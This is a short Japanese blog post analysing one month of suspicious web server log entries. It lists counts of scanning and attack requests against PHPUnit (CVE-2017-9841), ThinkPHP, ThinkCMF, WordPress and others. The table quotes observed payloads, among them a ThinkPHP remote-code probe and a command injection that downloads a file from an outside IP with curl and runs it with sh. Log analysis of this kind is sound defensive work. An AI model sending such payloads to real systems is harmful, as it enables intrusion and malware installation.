ITオムライス

webサーバのログの分析

2021-04-15 技術系

3月のwebサーバのログから通常のアクセスではない通信について分析しました。

多かったリクエスト

PHPUnitの脆弱性CVE-2017-9841のスキャン通信

/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php  

3月のログでは一番多かったです。
最近流行っているみたいです。
CVE-2017-9841を悪用したスキャン通信の増加 – wizSafe Security Signal -安心・安全への道標- IIJ

thinkPHPの脆弱性を利用した攻撃

/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21  

意図不明

/config/getuser?index=0  

それらしい脆弱性は見当たりませんでしたが、100回以上同じリクエストがありました。

WordPressの脆弱性を利用した攻撃

/?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php>  

あまり詳細はわからなかったのですが、WordPressの脆弱性らしいです。
同じIPから複数のWordPressとPHP関連のスキャンが来ていました。

不審な通信の一覧

url count
/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 248
/sellers.json 183
/wp-login.php 182
/.env 167
/_ignition/execute-solution 151
/config/getuser?index=0 115
/index.php 113
/wp-content/plugins/wp-file-manager/readme.txt 110
/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 108
/api/jsonws/invoke 108
/console/ 107
/Autodiscover/Autodiscover.xml 107
/manager/html 89
/cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5.206.227.228%2Fzero;sh%20zero;%22 87
/solr/admin/info/system?wt=json 72
/index.xml 67
/login 57
/jenkins/login 50
mstshash=Administr 44
/?a=fetch&content=die(@md5(HelloThinkCMF)) 38
/mifs/.;/services/LogService 36
/?XDEBUG_SESSION_START=phpstorm 36
/system_api.php 32
/wp/wp-login.php 26
/wordpress/wp-login.php 26
/blog/wp-login.php 26
/dns-query?dns=AAABAAABAAAAAAAAA3d3dwViYWlkdQNjb20AAAEAAQ 25
/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f 23
/boaform/admin/formLogin 23
/test.php 22
/actuator/health 22
/0bef 22

参考

CVE-2017-9841を悪用したスキャン通信の増加 – wizSafe Security Signal -安心・安全への道標- IIJ